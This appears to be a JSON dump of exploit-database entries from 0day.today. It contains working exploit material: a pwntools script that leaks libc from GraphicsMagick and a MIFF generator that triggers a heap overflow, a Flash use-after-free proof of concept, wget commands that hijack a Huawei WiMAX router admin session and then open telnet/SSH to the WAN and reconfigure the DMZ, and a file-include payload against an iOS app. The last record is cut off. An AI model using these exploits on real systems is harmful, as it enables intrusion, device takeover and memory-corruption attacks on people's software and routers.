{"result": {"zdt": [{"lastseen": "2018-04-03T00:19:14", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "SecuriTeam", "published": "2017-11-03T00:00:00", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-03T00:19:14", "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/", "value": 8.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16352", "CVE-2017-16353"], "modified": "2017-11-03T00:00:00", "id": "1337DAY-ID-28948", "href": "https://0day.today/exploit/description/28948", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n \r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n \r\nThe vulnerabilities found are:\r\n \r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n \r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n \r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n \r\n \r\nVulnerabilities details\r\n \r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n \r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n \r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n \r\nThe code which triggers the vulnerable code path is:\r\n \r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n \r\n \r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n \r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n \r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n \r\n \r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n \r\n \r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n \r\n \r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n \r\n \r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n \r\n \r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n \r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n \r\nProof of Concept\r\n \r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n \r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n \r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n \r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n \r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n \r\n \r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n \r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n \r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n \r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n \r\n \r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28948"}, {"lastseen": "2018-01-01T17:04:04", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "reporter": "Google Security Research", "published": "2016-09-08T00:00:00", "title": "Adobe Flash - Method Calls Use-After-Free", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-01T17:04:04", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-09-08T00:00:00", "id": "1337DAY-ID-24811", "href": "https://0day.today/exploit/description/24811", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846\r\n \r\nIf a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows:\r\n \r\nvar mc = this.createEmptyMovieClip( \"mc\", 1);\r\nmc.addProperty( \"f\", func, func );\r\nmc.f(\"hello\");\r\n \r\nfunction func(){\r\n \r\n mc.removeMovieClip();\r\n // Fix heap\r\n var d:Date = new Date();\r\n return d.getDate;\r\n \r\n } \r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24811"}, {"lastseen": "2018-03-02T01:40:17", "references": [], "description": "Exploit for hardware platform in category web applications", "edition": 2, "reporter": "Pierre Kim", "published": "2015-12-01T00:00:00", "title": "Huawei Wimax CSRF / Information Disclosure / Manipulation Vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-02T01:40:17", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-12-01T00:00:00", "id": "1337DAY-ID-24638", "href": "https://0day.today/exploit/description/24638", "sourceData": "## Advisory Information\r\n\r\nTitle: Huawei Wimax routers vulnerable to multiple threats\r\nAdvisory URL: https://pierrekim.github.io/advisories/2015-huawei-0x01.txt\r\nBlog URL: https://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.html\r\nDate published: 2015-12-01\r\nVendors contacted: Huawei, CERT.org\r\nRelease mode: Released\r\nCVE: no current CVE\r\nCERT Tracking number: VU#406192\r\nCNNVD: no current CNNVD\r\n\r\n\r\n\r\n## Product Description\r\n\r\nHuawei Technologies Co. Ltd. is a Chinese multinational networking\r\nand telecommunications equipment and services company.\r\nIt is the largest telecommunications equipment manufacturer in the world.\r\n\r\n\r\n\r\n## Vulnerabilities Summary\r\n\r\nThe Huawei BM626e device is a Wimax router / access point overall badly\r\ndesigned with a lot of vulnerabilities. The device is provided by\r\nMTN Cote d'Ivoire as a \"Wibox\". It's available in a number of countries to\r\nprovide Internet with a Wimax network.\r\n\r\nThe tests below are done using the last available firmware\r\n(firmware V100R001CIVC24B010).\r\n\r\nNote: This firmware is being used by other Huawei Wimax CPEs and\r\nHuawei confirmed that the devices below are vulnerable to the same threats:\r\n\r\n - EchoLife BM626e WiMAX CPE\r\n - EchoLife BM626 WiMAX CPE\r\n - EchoLife BM635 WiMAX CPE\r\n - EchoLife BM632 WiMAX CPE\r\n - EchoLife BM631a WiMAX CPE\r\n - EchoLife BM632w WiMAX CPE\r\n - EchoLife BM652 WiMAX CPE\r\n\r\nThe routers are still on sale and used in several countries. They are\r\nused, at least, in these countries:\r\n\r\n - MTN CI (Cote d'Ivoire)\r\n - Iran Cell (Iran)\r\n - Irak Telecom (Irak)\r\n - Libyamax (Libya)\r\n - Globe Telecom (Philippines)\r\n - Zain Bahrain (Bahrain)\r\n - FreshTel (Ukraine)\r\n\r\n\r\n\r\n## Details - unauthenticated information disclosure\r\n\r\nBy default, the webpage http://192.168.1.1/check.html contains\r\nimportant information\r\n(wimax configuration, network configuration, wifi and sip\r\nconfiguration ...) and is reachable without authentication.\r\n\r\nA JavaScript redirection will annoy the attacker (/login.html) and can\r\nbe easily defeated by using wget:\r\n\r\n [email\u00a0protected]:~# wget http://192.168.1.1/check.html; less check.html\r\n\r\n\r\n\r\n## Details - Admin session cookie hijacking\r\n\r\nIf an admin is currently managing the device (OR used the device but\r\ndidn't properly disconnect),\r\nthe current/used session can be stolen by an attacker located in the\r\nLAN (or WAN if the HTTP is open in the WAN interface).\r\n\r\nThe admin session id (\"SID\") can be recovered in multiple webpages\r\nwithout authentication:\r\n\r\n - http://192.168.1.1/wimax/security.html\r\n - http://192.168.1.1/static/deviceinfo.html\r\n - ...\r\n\r\nThe security.html webpage contains a valid session ID, without\r\nauthentication, within the JavaScript sources:\r\n\r\n sid=\"SID24188\"\r\n\r\n\r\nA \"protection\" is written in JavaScript and will redirect the attacker\r\nto the login webpage\r\nbut the Javascript contains the session of the admin (sid=\"SIDXXXXX\")\r\nso the attacker can retrieve it easily using wget:\r\n\r\n [email\u00a0protected]:~# wget http://192.168.1.1/wimax/security.html ; less security.html\r\n [email\u00a0protected]:~# wget http://192.168.1.1/static/deviceinfo.html ; less\r\ndeviceinfo.html\r\n\r\nNote that, by visiting the webpages, the attacker will also disconnect\r\nthe administrator from the Control Panel (http://192.168.1.1/)\r\n\r\n\r\n\r\n## Details - Information disclosure and CSRF using the stolen admin session ID\r\n\r\nBy using the previously stolen SID, it is possible to perform\r\nadministration tasks without having proper credentials:\r\n\r\n - editing the WLAN configuration,\r\n - editing the WAN configuation,\r\n - editing the LAN configuration,\r\n - opening HTTP/HTTPS/TELNET/SSH in the LAN and WAN interfaces,\r\n - changing DMZ configurations,\r\n - editing PortMapping,\r\n - editing Porttrigger,\r\n - editing SIP configuration,\r\n - uploading a custom firmware,\r\n - ...\r\n\r\n\r\no Retrieve private information (network information):\r\n\r\n\r\n [email\u00a0protected]:~# wget -qO-\r\n'http://192.168.1.1/static/rethdhcp.jsx?WWW_SID=SID24188&t=0'\r\n Saving to: `STDOUT'\r\n\r\n stats={};do{stats.dhcplist=\"44:8A:5B:AA:AA:AA,192.168.1.3,71:52:[email\u00a0protected]:E0:4C:AA:AA:AA,192.168.1.2,71:52:02\";\r\n stats.reth=\"\r\n eth0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1\r\n RX packets:27 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:109 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:2887 (2.8 KiB) TX bytes:46809 (45.7 KiB)\r\n Interrupt:9 Base address:0x4000\r\n eth1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:\r\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\r\n Interrupt:9 Base address:0x4000\r\n eth2 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1\r\n RX packets:2530 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:2619 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:351557 (343.3 KiB) TX bytes:536669 (524.0 KiB)\r\n Interrupt:9 Base address:0x4000\r\n eth3 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:1\r\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\r\n Interrupt:9 Base address:0x4000\r\n \";stats.wlaninfo=\"\r\n wl0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n RX packets:5257 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:846 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:1117126 (1.0 MiB) TX bytes:279600 (273.0 KiB)\r\n wl1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n [...]\r\n\r\n [email\u00a0protected]:~#\r\n\r\n\r\n\r\no Retrieve private information:\r\n\r\nAn other JSX webpage:\r\nhttp://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0\r\n\r\n [email\u00a0protected]:~# wget -qO-\r\n'http://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0'\r\n stats={};do{stats.PPPoEStatus='Disconnected';\r\nstats.GREStatus='Disconnected';stats.wpsmode=\"7\";stats.position=\"Idle,Idle,\"}while(0);\r\n\r\nIt's possible to get a lot of information by abusing JSX webpages.\r\nListing the JSX webpages is left as an exercise for the reader.\r\n\r\n\r\n\r\n\r\nThe Session ID can be used to change parameters in the Wimax router too:\r\n\r\no Editing the WLAN configuration:\r\n\r\nThis request will change the first SSID name to 'powned' (you need to\r\nedit the WWW_SID, by the one provided in the /wimax/security.html\r\nwebpage):\r\n\r\n [email\u00a0protected]:~# wget --no-cookies --header \"Cookie:\r\nLoginTimes=0:LoginOverTime=0; FirstMenu=User_1; SecondMenu=User_1_1;\r\nThirdMenu=User_1_1_1\"\r\n--post-data='WWW_SID=SID24188&REDIRECT=wlan.html&SERVICE=wifi&SLEEP=2&WLAN_WifiEnable=1&Wlan_chkbox=0&WLAN_WirelessMode=9&WLAN_Channel=0&WLAN_SSID1=powned&WLAN_HideSSID=0%3B0%3B&WLAN_AuthMode=WPAPSKWPA2PSK%3BWPAPSKWPA2PSK%3B&WLAN_EncrypType=TKIPAES%3BTKIPAES%3B&WLAN_COUNTRY_REGION=1&WLAN_Country_Code=1d&WLAN_TXPOWER_NOR=13&WLAN_MAXNUM_STA=16%3B16%3B&WLAN_FragThreshold=2346&WLAN_BeaconPeriod=100&WLAN_RTSThreshold=2347&WLAN_BssidNum=2&WLAN_WscConfMode=7&WLAN_WscAction=3&WLAN_CountryCode=CI&WLAN_WscPinCode=&WLAN_TXRATE=0&WLAN_HTBW=0&WLAN_NTH_SSID=1&WLAN_PinFlag=2'\r\nhttp://192.168.1.1/basic/mtk.cgi\r\n\r\n\r\no Opening the management interface:\r\n\r\nThis request will open HTTP/HTTPS/TELNET/SSH in the LAN AND the WAN\r\ninterfaces (you need to edit the WWW_SID, by the one provided in the\r\n/wimax/security.html webpage):\r\n\r\n [email\u00a0protected]:~# wget --no-cookies --header \"Cookie:\r\nLoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1;\r\nThirdMenu=User_2_1_0\"\r\n--post-data='WWW_SID=SID24188&REDIRECT=acl.html&SERVICE=mini_httpd%2Cmini_httpsd%2Ctelnetd%2Cdropbear&SLEEP=2&HTTPD_ENABLE=1&HTTPSD_ENABLE=1&MGMT_WEB_WAN=1&MGMT_TELNET_LAN=1&MGMT_TELNET_WAN=1&MGMT_SSH_LAN=1&MGMT_SSH_WAN=1&HTTPD_PORT=80&httpslan=getValue%28&HTTPSD_PORT=443&TELNETD_PORT=23&SSHD_PORT=22'\r\nhttp://192.168.1.1/basic/mtk.cgi\r\n\r\n (The legit administrator can check the changes here:\r\nhttp://192.168.1.1/advanced/acl.html)\r\n\r\n\r\no Changing \"DMZ action\" - redirecting WAN ports to a target client\r\nlocated in the LAN (you need to edit the WWW_SID, by the one provided\r\nin the /wimax/security.html webpage):\r\n\r\n [email\u00a0protected]:~# wget --no-cookies --header \"Cookie:\r\nLoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1;\r\nThirdMenu=User_2_1_0\"\r\n--post-data='WWW_SID=SID24188&REDIRECT=dmz.html&SERVICE=netfilter_dmz&NETFILTER_DMZ_HOST=192.168.1.2&NETFILTER_DMZ_ENABLE=1&DMZInterface=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1&DMZHostIPAddress=192.168.1.2&DMZEnable=on&TriggerPort=&TriggerPortEnd='\r\nhttp://192.168.1.1/advanced/user.cgi\r\n\r\n (The legit administrator can check the changes here:\r\nhttp://192.168.1.1/advanced/dmz.html)\r\n\r\n\r\nOther actions are possible and are left as an exercise for the reader:\r\n\r\n - Editing PortMapping\r\n - Editing Porttrigger\r\n - Editing Sip configuration\r\n - Uploading a custom firmware\r\n - ...\r\n\r\n\r\n\r\n## Vendor Response\r\n\r\nThe vulnerable routers are in the End Of Service cycle and will not be\r\nsupported anymore.\r\n\r\nThe vendor encourages its clients to discard existing unsupported models\r\nand to use new routers.\r\n\r\n\r\n\r\n## Report Timeline\r\n\r\n * Jul 01, 2015: Vulnerabilities found by Pierre Kim.\r\n * Oct 28, 2015: Huawei PSIRT is notified of the vulnerabilities.\r\n * Oct 28, 2015: Huawei PSIRT confirms the notification.\r\n * Nov 03, 2015: Huawei PSIRT is unable to reproduce the\r\nvulnerabilities (\"We cannot open the following web pages without\r\nauthentication\")\r\n * Nov 03, 2015: Pierre Kim informs Huawei to desactivate JavaScript\r\nand gives Huawei a complete scenario with Linux commands. Pierre Kim\r\nasks their firmware version.\r\n * Nov 04, 2015: Pierre Kim asks Huawei about potential difficulties\r\nwith the provided scenario.\r\n * Nov 05, 2015: Huawei PSIRT says that they are currently working on\r\nthe firmware version issue and will notify in due course.\r\n * Nov 09, 2015: Huawei PSIRT confirms the vulnerabilities affecting\r\nEchoLife BM626e WiMAX CPE. \"All the versions of this product are\r\nvulnerable\".\r\n * Nov 09, 2015: Pierre Kim asks about 8 other Wimax models which are\r\nlikely to be vulnerable too (using the same firmware) and asks about\r\nif security patches will be distributed or the devices are EoL.\r\n * Nov 11, 2015: Huawei PSIRT notifies the investigation of 8 other\r\nWimax models is in progress.\r\n * Nov 18, 2015: Huawei PSIRT confirms 6 models are affected (EchoLife\r\nBM626 WiMAX CPE, EchoLife BM635 WiMAX CPE, EchoLife BM632 WiMAX CPE,\r\nEchoLife BM631a WiMAX CPE, EchoLife BM632w WiMAX CPE, EchoLife BM652\r\nWiMAX CPE). The routers are in the End Of Service cycle and Huawei\r\nwould not support these models or provide fixed version or patch.\r\n * Nov 18, 2015: Huawei PSIRT asks to be notified when the advisory is posted.\r\n * Nov 19, 2015: Pierre Kim contacts CERT.org about the vulnerabilities.\r\n * Nov 23, 2015: Cert.org assigns VU#406192.\r\n * Nov 30, 2015: Pierre Kim indicates to Huawei PSIRT that he will\r\nrelease the advisory the December 1, 2015.\r\n * Dec 01, 2015: A public advisory is sent to security mailing lists.\r\n\r\n\r\n\r\n## Credit\r\n\r\nThese vulnerabilities were found by Pierre Kim (@PierreKimSec).\r\n\r\n\r\n\r\n## References\r\n\r\nhttps://pierrekim.github.io/advisories/2015-huawei-0x01.txt\r\nhttps://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.html\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24638"}, {"lastseen": "2018-04-05T23:38:55", "references": [], "description": "Wifi Drive Pro version 1.2 suffers from a local file inclusion vulnerability.", "edition": 2, "reporter": "bot", "published": "2015-04-21T00:00:00", "title": "Wifi Drive Pro 1.2 Local File Inclusion Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-05T23:38:55", "vector": "AV:L/AC:M/Au:M/C:N/I:N/A:C/", "value": 4.1}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-04-21T00:00:00", "id": "1337DAY-ID-23556", "href": "https://0day.today/exploit/description/23556", "sourceData": "Document Title:\r\n===============\r\nWifi Drive Pro v1.2 iOS - File Include Web Vulnerability\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nThis app lets you use your iphone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files.\r\nUsing the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you go.\r\n\r\n(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application.\r\n\r\nAffected Product(s):\r\n====================\r\nMindspeak Software\r\nProduct: Wifi Drive Pro - iOS Mobile Web Application 1.2\r\n\r\nTechnical Details & Description:\r\n================================\r\nA local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application.\r\nThe local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands \r\nto compromise the mobile web-application.\r\n\r\nThe web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with malicious \r\n`filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in \r\nthe index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` \r\nin connection with the vulnerable file upload POST method request. \r\n\r\nRemote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious \r\nattack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. \r\n\r\nThe security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. \r\nExploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation \r\nof the local file include web vulnerability results in mobile application compromise or connected device component compromise.\r\n\r\nRequest Method(s):\r\n [+] [POST]\r\n\r\nVulnerable Module(s):\r\n [+] File Upload\r\n\r\nVulnerable Parameter(s):\r\n [+] filename\r\n\r\nAffected Module(s):\r\n [+] Index File Dir Listing (http://localhost:49276/)\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.\r\nFor security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.\r\n\r\nPoC: GET\r\nhttp://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png\r\n\r\n\r\nPoC: Vulnerable Source\r\n<p><a href=\"..\">..</a><br>\r\n<a href=\"68-2.png\">68-2.png</a> ( 24.3 Kb, 2015-03-09 14:57:29 +0000)<br>\r\n<a href=\"/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png\"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a> ( 0.5 Kb, 2015-03-09 14:57:48 +0000)<br />\r\n</p><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"form1\" id=\"form1\"><label>upload file<input type=\"file\" name=\"file\" id=\"file\" /></label>\r\n<label><input type=\"submit\" name=\"button\" id=\"button\" value=\"Submit\" /></label></form></body></html></iframe></a></p>\r\n\r\n\r\n--- PoC Session Logs [POST] (Inject)---\r\nStatus: 200[OK]\r\nPOST http://localhost:49276/ \r\nLoad Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr\u00f6\u00dfe des Inhalts[846] Mime Type[application/x-unknown-content-type]\r\n Request Header:\r\n Host[localhost:49276]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n 